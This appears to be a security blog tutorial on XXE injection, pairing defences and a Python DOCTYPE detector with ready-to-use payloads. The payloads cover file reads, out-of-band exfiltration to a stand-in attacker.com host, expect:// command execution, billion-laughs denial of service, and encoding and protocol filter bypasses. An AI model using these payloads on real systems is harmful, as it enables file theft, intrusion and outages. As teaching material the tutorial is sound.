Web Vulnerabilities: XXE and Bypassing XML Exploitation Detection
2025-08-11 21:26:09
XXE Vulnerabilities and XML Exploitation Detection Bypass in Detail
I. XXE overview
XXE (XML External Entity Injection) is an XML external entity injection vulnerability. It arises when an application parses XML input without disabling the loading of external entities. An attacker can exploit it to:
- read files on the server
- execute commands
- scan internal network ports
- attack internal websites
- launch denial-of-service attacks
II. Core differences between XML and HTML
| Property | XML | HTML |
|---|---|---|
| Design purpose | Transport and store data; concerned with data content | Display content; concerned with data appearance |
| Extensibility | Custom tags can be defined | Fixed tag set |
| Case sensitivity | Yes | No |
| Tag closing | Must be strictly closed | Some tags may be left unclosed |
III. XXE attack techniques in detail
1. File reading
Basic read:
```xml
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///d:/test.txt">
]>
<x>&xxe;</x>
```
Base64-encoded read (for files whose content contains spaces):
```xml
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///d:/test.txt">
<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
%remote;
%send;
]>
```
Contents of the corresponding evil.dtd:
```xml
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://attacker.com/?data=%file;'>">
%all;
```
2. Internal network probing and attacks
Port probing:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY rabbit SYSTEM "http://127.0.0.1:8080/index.txt">
]>
<x>&rabbit;</x>
```
The port state is inferred from the response time:
- fast response → port open
- slow or no response → port closed
3. Remote code execution (requires a specific environment)
```xml
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "expect://id">
]>
<x>&xxe;</x>
```
4. Loading an external DTD
```xml
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://attacker.com/evil.dtd">
%file;
]>
<x>&send;</x>
```
Contents of evil.dtd:
```xml
<!ENTITY send SYSTEM "file:///d:/test.txt">
```
5. Blind (no-echo) file reading
```xml
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=test.txt">
<!ENTITY % dtd SYSTEM "http://attacker.com/test.dtd">
%dtd;
%send;
]>
```
Contents of test.dtd:
```xml
<!ENTITY % payload "<!ENTITY % send SYSTEM 'http://attacker.com/?data=%file;'>">
%payload;
```
6. Denial of service
Memory exhaustion attack (nested entity expansion):
```xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
```
UNIX system hang attack (reading a blocking device):
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///dev/random">
]>
<foo>&xxe;</foo>
```
IV. Bypass techniques
1. Keyword filter bypass
UTF-16BE encoding bypass (re-encodes the payload so byte-level keyword matching no longer sees the ASCII keywords):
```shell
cat payload.xml | iconv -f utf-8 -t utf-16be > payload.8-16be.xml
```
2. Protocol-based bypass
data:// protocol (the base64 part decodes to an `<!ENTITY % d SYSTEM ...>` declaration pointing at evil.dtd):
```xml
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % a SYSTEM "data://text/plain;base64,PCFFTlRJVFkgJSBkIFNZU1RFTSAnaHR0cDovL2F0dGFja2VyLmNvbS9ldmlsLmR0ZCc+">
%a;
%d;
]>
<test>&hhh;</test>
```
file:// protocol + file upload:
```xml
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % a SYSTEM "file:///var/www/uploads/uploaded.jpg">
%a;
]>
```
php://filter protocol + file upload:
```xml
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % a SYSTEM "php://filter/resource=/var/www/uploads/uploaded.jpg">
%a;
]>
<test>&hhh;</test>
```
V. XXE defences
1. Disable external entities
PHP:
```php
libxml_disable_entity_loader(true);
```
Java:
```java
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
```
Python:
```python
from lxml import etree
xmlData = etree.parse(xmlSource, etree.XMLParser(resolve_entities=False))
```
2. Input filtering
Filter the following keywords:
- `<!DOCTYPE`
- `<!ENTITY`
- `SYSTEM`
- `PUBLIC`
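The keyword filter above is only as good as the decoding step in front of it: the UTF-16BE re-encoding from section IV defeats a byte-level match. The following added example (not from the original post) contrasts a naive byte match with a decode-then-match check, and with the stronger parser-level option of rejecting any DOCTYPE outright using the standard-library expat parser, which does its own UTF-8/UTF-16 autodetection. The sample documents and the function names are constructed for this example.

```python
import xml.parsers.expat

# Keywords from the input-filtering list, matched on the DECODED text so that
# a UTF-16 re-encoding of the payload (iconv -t utf-16be) cannot hide them.
MARKERS = ("<!DOCTYPE", "<!ENTITY", "SYSTEM", "PUBLIC")

def sniff_encoding(raw: bytes) -> str:
    """Detect UTF-16 from the BOM or the first bytes (XML spec, Appendix F)."""
    if raw.startswith((b"\xfe\xff", b"\x00<")):
        return "utf-16-be"
    if raw.startswith((b"\xff\xfe", b"<\x00")):
        return "utf-16-le"
    return "utf-8"  # plain UTF-8, with or without a UTF-8 BOM

def naive_byte_filter(raw: bytes) -> bool:
    """Byte-level keyword match: the weak check the encoding trick defeats."""
    return any(m.encode() in raw for m in MARKERS)

def find_xxe_markers(raw: bytes) -> list:
    """Decode first, then match case-insensitively; returns the markers found."""
    text = raw.decode(sniff_encoding(raw), errors="replace").upper()
    return [m for m in MARKERS if m in text]

class DoctypeRejected(ValueError):
    pass

def parse_without_doctype(raw: bytes) -> bool:
    """Parser-level defence: abort on any DOCTYPE, so no entity can be declared.
    expat autodetects UTF-8/UTF-16 itself, so the encoding bypass does not apply."""
    parser = xml.parsers.expat.ParserCreate()
    def reject(*_args):
        raise DoctypeRejected("DOCTYPE declarations are not accepted")
    parser.StartDoctypeDeclHandler = reject
    parser.Parse(raw, True)
    return True

# Constructed samples: the file-read payload from section III as UTF-8, the same
# document re-encoded as UTF-16BE (what the iconv command produces), and a benign one.
PAYLOAD_UTF8 = (b'<?xml version="1.0"?>\n<!DOCTYPE ANY [\n'
                b'<!ENTITY xxe SYSTEM "file:///d:/test.txt">\n]>\n<x>&xxe;</x>')
PAYLOAD_UTF16BE = PAYLOAD_UTF8.decode("utf-8").encode("utf-16-be")
BENIGN = b'<?xml version="1.0"?>\n<x>hello</x>'

if __name__ == "__main__":
    for name, doc in [("utf8", PAYLOAD_UTF8), ("utf16be", PAYLOAD_UTF16BE), ("benign", BENIGN)]:
        print(name, "naive:", naive_byte_filter(doc), "decoded:", find_xxe_markers(doc))
        try:
            parse_without_doctype(doc)
            print(name, "parsed")
        except DoctypeRejected as exc:
            print(name, "rejected:", exc)
```

Running it shows the UTF-16BE document slipping past the naive check while both the decoded match and the DOCTYPE-rejecting parser still catch it.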
3. Other measures
- Use a simpler data format (such as JSON) in place of XML
- Keep XML processing libraries up to date
- Apply strict input validation
- Configure the XML processor to disable DTDs and external entities
VI. Automated detection tools
Recommended tools:
- XXEinjector
- OWASP ZAP
- Burp Suite Scanner
- XXExploiter
With a thorough understanding of how XXE works, the attack techniques involved and the corresponding defences, developers and security engineers can guard against this class of threat more effectively.